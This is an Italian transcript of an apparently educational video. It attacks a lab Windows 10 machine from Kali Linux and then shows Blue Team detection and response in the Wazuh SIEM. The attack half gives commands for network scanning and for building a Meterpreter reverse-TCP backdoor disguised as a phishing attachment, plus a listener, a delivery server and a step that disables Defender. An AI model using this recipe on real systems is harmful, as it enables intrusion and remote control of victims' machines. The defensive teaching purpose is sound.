Tutti vogliono fare gli hacker. Tutti vogliono usare Kali Linux, lanciare exploit, bucare server e sentirsi dentro Matrix. Ma c'è una cosa che nessuno vi dice mai. Mentre l'attaccante si diverte, là fuori c'è qualcuno che deve ripulire il casino. Qualcuno che lavora nell'ombra per difendere infrastrutture da milioni di euro. Oggi non vedremo come si attacca. Oggi vi porto dall'altra parte della barricata. Benvenuti nel mondo del Blue Team. In questo video abbiamo creato un vero e proprio laboratorio di cybersecurity. Da questa parte lanceremo un attacco reale da Kali Linux, dall'altra parte vedremo cosa vede un analista SOC sul suo SIEM in tempo reale, come si intercetta una reverse shell e come si isola un hacker prima che distrugga tutto. Mettetevi comodi, scaldate il terminale, perché oggi capiamo come lavora la difesa informatica. Bene ragazzi, e siamo dentro il centro di comando del nostro Blue Team. Questa che vedete a schermo è la dashboard di Wazu, una piattaforma open source che unisce due mondi fondamentali per la difesa. È sia un SIEM, quindi raccoglie e analizza log, e sia un EDR, quindi monitora cosa succede fisicamente sui singoli PC. Quel cerchietto verde in alto a sinistra sotto Agent Summary ci dice Active 1, significa che abbiamo installato un piccolo software spia, tecnicamente spia, chiamato Agente all'interno della nostra macchina Windows 10. Da questo momento, qualsiasi cosa accada su Windows, Wazu lo sa. Sulla nostra macchina Windows il programma gira in background, lui però è continuamente in ascolto. Mentre invece in alto al centro abbiamo il termometro della situazione, gli alert delle ultime 24 ore. Sono divisi per gravità, quindi low, medium, high e critical, e al momento la situazione è molto tranquilla. Abbiamo solo alert bassi o medi che di solito tecnicamente sono normali, attività di Windows o piccoli aggiornamenti da fare, perché comunque la macchina Windows non è pienamente aggiornata. Se l'hacker tocca la macchina vedremo schizzare i counter, quindi questi counter rossi di height e critical. Bene ragazzi, ora piccolo tour del tool. Il blocco Endpoint Security si divide in tre categorie. Il malware detection, che è il modulo che controlla se sulla macchina Windows entrano virus, ransomware o minacce note, e se un hacker scarica una backdoor scatta il blocco. Poi c'è il FIM, questa è una delle funzioni diciamo importanti del Blue Team, dove monitora i file di sistema, e se un utente o anche un malware in background prova a modificare un file di configurazione o un file di sistema Windows, Wazu lancia un alert dicendoci che qualcuno ha toccato questo file. E poi abbiamo il Configuration Assessment, non è altro che il controllo del sistema operativo, quindi se è configurato bene o se ci sono porte o impostazioni lasciate aperte, quindi per errore, che facilitano la vita agli hacker. E poi non può mancare il cervello. Che cos'è il cervello? È la Threat Intelligence. La Threat Intelligence si divide in due categorie. Il Threat Hunting, quindi lo spazio per i tier, che sono i detective, e permette quindi di scavare manualmente tra i log per cercare minacce nascoste che non hanno ancora fatto scattare allarmi automatici. E poi i MITR, tecnicamente parlando, attack. Questa è una matrice mondiale che mappa tutte le tattiche e le tecniche conosciute usate dagli hacker. Quindi Wazu collegherà gli attacchi che subiremo direttamente a questa mappa, dicendoci esattamente quale tecnica sta usando l'attaccante. Bene, ora prima di passare comunque all'attacco vero e proprio, non faremo altro che spostarci sulla macchina attaccante, quindi Kali. Però ragazzi, fermiamoci un secondo, voglio spiegarvi cosa stiamo simulando di preciso e perché questo non è un test a caso, è una replica esatta di una vera infrastruttura aziendale. In molti miei video non abbiamo fatto altro che creare payload, attaccare oppure far vedere come funziona un attacco informatico, mentre oggi invece vi voglio far vedere come ci si difende da un attacco informatico, quindi come lavora in genere un Blue Team a livello aziendale.
Quindi immaginiamo questo scenario: la macchina Ubuntu che avete visto prima, dove gira il manager di Wazu, rappresenta il server centrale della sicurezza dell'azienda, quindi sta protetto nel server room o nel cloud ed è gestito dal SOC. Che cos'è il SOC? Il team di difesa. La macchina invece Windows 10 è il classico computer dell'ufficio di un qualsiasi reparto, di un qualsiasi utente, quindi un PC normale usato da un dipendente qualunque. E nelle aziende serie, ragazzi, su ogni singolo computer dei dipendenti viene installato un agente spia. Che cos'è questo agente spia? È un agente che lavora in background e quindi il dipendente non nota nulla, il PC non rallenta, ma l'agente sta lì a monitorare e a guardare tutto quello che succede a livello di processi e file, inviando costantemente i dati al server centrale, quello che sta su Ubuntu. Quindi ora faremo finta di essere degli hacker e faremo finta di aver trovato un modo per entrare in questa macchina Windows 10 e quindi sfideremo un intero sistema difensivo centralizzato. Bene, ora ragioniamo come se stessimo all'interno di un'azienda. L'intera azienda lavora su una sola sottorete, o meglio, lavorano su più sottoreti, ma queste sottoreti lavorano su delle policy e quindi tutto si concentra su un'unica sottorete. Bene, immaginiamo ora che il nostro indirizzo IP di Kali, che è 192.168.172.128, sia un indirizzo IP di tutta la rete dell'infrastruttura. Quindi la prima cosa che un attaccante fa all'interno di un'azienda è scansionare la rete. Bene, ora sapendo che il nostro indirizzo IP di Kali è 172.128, possiamo dedurre che tutta la sottorete, quindi delle nostre tre macchine di Ubuntu e di Windows 10, giri all'interno della 172.0. Quindi la prima cosa che fa un hacker, ragazzi, non è altro che mappare la rete. Quindi apri un terminale e con il comando sudo nmap-sn 192.178.172.0 sulla barra 24 non fa altro che scansionare tutta la sottorete che sta a livello aziendale. Bene, lui fa la sua scansione e ci dice che ci sono questi indirizzi IP. Deduciamo che il 172.1 è il gateway e abbiamo il 172.129.130 e poi altri sotto gateway. Bene, ora sappiamo che tutti questi indirizzi IP sono up, quindi rispondono all'interno della rete, ma a noi interessa trovare esattamente la macchina Windows 10 senza andare a tentativi. Quindi con il comando sudo nbtscan la classe, quindi 172.0/24, diamo un invio e lui ci dirà esattamente quali host corrispondono a quei determinati indirizzi. Bene, e ci dice che sul 192.168.172.130 risponde un desktop AVB eccetera. Sicuramente non è la macchina Kali e sicuramente non è la macchina Ubuntu, perché entrambe le macchine non si chiamano desktop. Sicuramente il 172.1 è il mio desktop principale, quindi quello fuori dalla mia VM che dà la rete generale, e poi abbiamo invece il 172.130 che molto probabilmente è la macchina Windows 10. Se noi andiamo a vedere il nome del PC sappiamo che è AVB eccetera, ed effettivamente il 130 corrisponde al nostro target. L'hacker ha preso l'indirizzo IP della macchina, sa che è una macchina Windows 10 e vuole attaccare questa macchina. Bene, ora scansionato la sottorete, sappiamo che la nostra macchina Windows 10 ha come target .130 e sapendo che la nostra macchina Kali, quindi attaccante, ha come target .128, non faremo altro che creare una backdoor e iniettarla all'interno di Windows 10 per vedere come si comporta il nostro EDR, quindi per vedere il nostro Blue Team in azione. Per prima cosa, ragazzi, con il comando msfvenom -p windows per 64 meterpreter reverse tcp lost, quindi di Kali, e una porta 4x4 -f exe e -o preventivo.exe, non faremo altro che creare il nostro payload. Perché chiamarlo preventivo.exe? Perché simuleremo una delle tecniche di phishing più comuni da circa
30 anni, dove l'hacker invia una finta mail alla vittima con un allegato malevolo e quindi l'utente di turno scarica questo allegato, apre il nostro preventivo.exe e noi quindi ci creiamo una backdoor. Questo, ragazzi, succede in tutte le aziende del mondo anche nel 2026. Non faremo altro che cliccare invio. Una volta creato il nostro payload, apriremo un altro terminale. Con il comando msf console diamo un invio e apriremo il nostro framework. Con il comando use multi/handler diamo un invio, diremo al nostro framework di aprire una sottofinestra e quindi andare a settare la nostra backdoor. E quindi con un set payload Windows per 64 meterpreter/reverse TCP diamo un invio. Per chi non lo sa, la reverse TCP, ragazzi, non è altro che dire a Kali: ok, io voglio il controllo remoto della tua macchina Windows 10. Poi più in là la macchina Windows ci darà il benvenuto all'interno della macchina e noi attraverso la shell saremo i proprietari della macchina Windows. Poi con un set lhost l'indirizzo IP di Kali e poi andiamo a settare la porta con un set il port 4x4. Dopodiché, ragazzi, run. Bene, ora lui che cosa fa? Si mette in ascolto, lo lasciamo in questo angolino fino a quando il preventivo.exe non verrà aperto all'interno della macchina Windows. Ora non faremo altro che trasferire il nostro preventivo.exe all'interno della macchina Windows. In uno scenario reale, quindi in un'infrastruttura aziendale, al 99,9% ci sarà un'email di phishing con un allegato magari trasformato in PDF dove l'utente lo clicca, non si apre, lo clicca più volte, invece quello è un exe, quindi è un eseguibile magari che gira in background e quindi è una backdoor. Bene, noi invece ora non faremo altro che trasferirlo attraverso un piccolo web server. Come si fa a trasferire un file all'interno della stessa rete? Apriamo un terminale e con il comando python 3-m http.server80 diamo un invio e creiamo un piccolo web server. Ora non faremo altro che recarci sulla macchina Windows, apriamo Google. Ovviamente, ragazzi, dobbiamo disabilitare la protezione in tempo reale di Windows Defender perché sennò ci blocca automaticamente il nostro payload. Entriamo all'interno della nostra directory di Kali, andiamo a cercare il preventivo.exe, lo clicchiamo, lo scarichiamo, possiamo chiudere il nostro web server. Bene, ritorniamo nel nostro server di Ubuntu e già qualcosa si sta smuovendo. L'alert love è aumentato a 812, ancora non è nulla. Sicuramente perché abbiamo creato un piccolo web server e quindi siamo entrati all'interno della macchina Kali e abbiamo scaricato questo file. Ora non faremo altro che andare sulla macchina Windows, nella sezione download e fare un doppio clic su preventivo.exe. Lui ci dirà che il PC è protetto da Windows, facciamo esegui comunque. L'utente non avvertirà nulla perché la nostra backdoor è molto silenziosa e ci ha dato accesso, come potete vedere, alla macchina Windows. Ora, facendo una prova, faccio un get to id e vediamo che utente siamo e sappiamo che la macchina è desktop bla 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 /Refle. Refle è l'account di Windows 10 ed effettivamente l'account è Refle. Ora ci spostiamo all'interno della shell dove abbiamo una sessione con i superpoteri. Ci spostiamo all'interno della macchina principale, quindi ora siamo come utente amministratore e quindi, ragazzi, siamo i padroni della macchina. Ci spostiamo all'interno del nostro server, riaggiorniamo la pagina e ora vediamo come si comporta un blue team. Andiamo nelle sessioni attive, clicchiamo sulla nostra macchina Windows e come possiamo notare, ragazzi, il riquadro Mitre Attack al centro già ci sta dicendo che sono state rilevate delle tattiche molto gravi. In questo caso abbiamo la defense evasion, quindi l'hacker ha provato a nascondersi o a bypassare i controlli. La persistenza, quindi il malware sta cercando un modo per rimanere attivo nel PC anche se l'utente riavvia il computer. E poi la privilege escalation, l'attaccante sta provando a diventare amministratore di sistema. Ora ci spostiamo all'interno del threat hunting, ci spostiamo
negli eventi, analizziamo i log e vediamo insieme questa in gergo Matrix Blue Team. Questa lista dei log è la prova schiacciante. La precisione è al millisecondo, quindi sappiamo che alle 21:41 di quel preciso istante l'agente registra, come potete vedere, lo Special Privilege Assigned to New Logon e subito dopo User Account Changed. Che cosa significa in codice aziendale? Significa che un processo non autorizzato ha appena ottenuto i superpoteri di amministratore sul PC del dipendente, mentre invece la License Activation Failed, che sarebbe la SLUI.exe, non è altro che il malware ha tentato di usare un file di Windows reale chiamato SLUI.exe per bypassare il controllo del UAC e agire indisturbato. L'hacker su Kali pensa di essere invisibile, ma ha appena lasciato una scia di impronte giganti nei nostri registri. Bene, ora andando a fondo nei log prendiamo per esempio User Account Changed, perché questo salta subito all'occhio. Apriamo direttamente il log e questo, ragazzi, significa solo una cosa: un account utente è stato modificato. Se scendiamo invece nei dettagli vediamo il nome dell'account colpito, quindi Refle. L'hacker non è rimasto fermo a guardare, ha manipolato direttamente l'utente del PC aziendale per prendersi i massimi privilegi. Un analista quindi di Blue Team a questo punto ha tutto quello che serve. Sa qual è il PC compromesso e sa quale utente è stato violato e sa che c'è ancora una minaccia attiva in corso, quindi ora è il momento di staccare la spina all'hacker. Bene, ora sappiamo che l'account Refle è stato modificato, ma l'hacker probabilmente è stato furbo e ha ripulito o nascosto i log di avvio del file preventivo.exe. Un bravo Blue Team sa che nella security ogni azione lascia una scia. Se voi guardate questo dettaglio, sotto la voce Data Win System Process ID abbiamo un numero 684. Questo è il PID, identificativo del processo killer che ha modificato l'utente. Anche se noi non sappiamo ancora il nome del file lato server, abbiamo il suo numero di targa. Ora andiamo sul PC della vittima e andiamo a vedere a chi appartiene questa targa. In gestione attività andiamo su dettagli e non faremo altro, ragazzi, che cercare il PID con il numero 684. Quindi nella colonna PID lo clicchiamo e andiamo a cercare il 684. E come potete vedere abbiamo elsas.exe, ma noi il nostro malware l'abbiamo chiamato preventivi.exe. Perché ora invece si chiama elsas.exe? Bene, la nostra backdoor ha fatto una tecnica avanzata chiamata Process Injection o, come volete voi, migrazione. In pratica, per nascondersi e non farsi killare dall'utente, il malware si è iniettato dentro un processo di sistema già esistente, quindi accettato da Windows, e ha scelto proprio elsas.exe per rubare i token di sicurezza e modificare l'account agendo all'interno di Windows. Bene, ora noi non faremo altro che andare a killare questo processo, quindi tasto destro termina albero processi, e quindi ora noi perderemo l'accesso alla nostra macchina. E come potete vedere la sessione è chiusa. Ma quindi ora è tutto ok? No, assolutamente. Semplice, ragazzi, un esperto non killa i processi a caso dal task manager, ma torna sulla console di gestione e usa l'active response o isola direttamente la scheda di rete della macchina virtuale, oppure magari scova questa connessione TCP aperta e la taglia a livello di firewall. Ovviamente, ragazzi, sappiamo che la sessione è interrotta e l'hacker ha perso la connessione ed è stato buttato fuori. Il PC è tecnicamente isolato e sicuro, pronto per essere ripulito con calma dal Blue Team senza che l'attaccante possa fare più danni. In uno scenario reale
Se fosse successo all'interno di un'infrastruttura aziendale, il team interviene istantaneamente, prende il possesso della macchina o, meglio ancora, la scollega e se la porta in un luogo sicuro al di fuori della rete aziendale. Questo è il lavoro del Blue Team. È un gioco di guardia ladri digitale dove per vincere non basta installare un antivirus, ma bisogna saper leggere i log, capire le tecniche di migrazione dei processi e agire con sangue freddo prima che sia troppo tardi. Se questo video vi ha fatto capire che la difesa è figa almeno quanto l'attacco, lasciate un bel like e iscrivetevi al canale. E come diciamo sempre io e Gino, restate curiosi, restate sicuri, restate invisibili.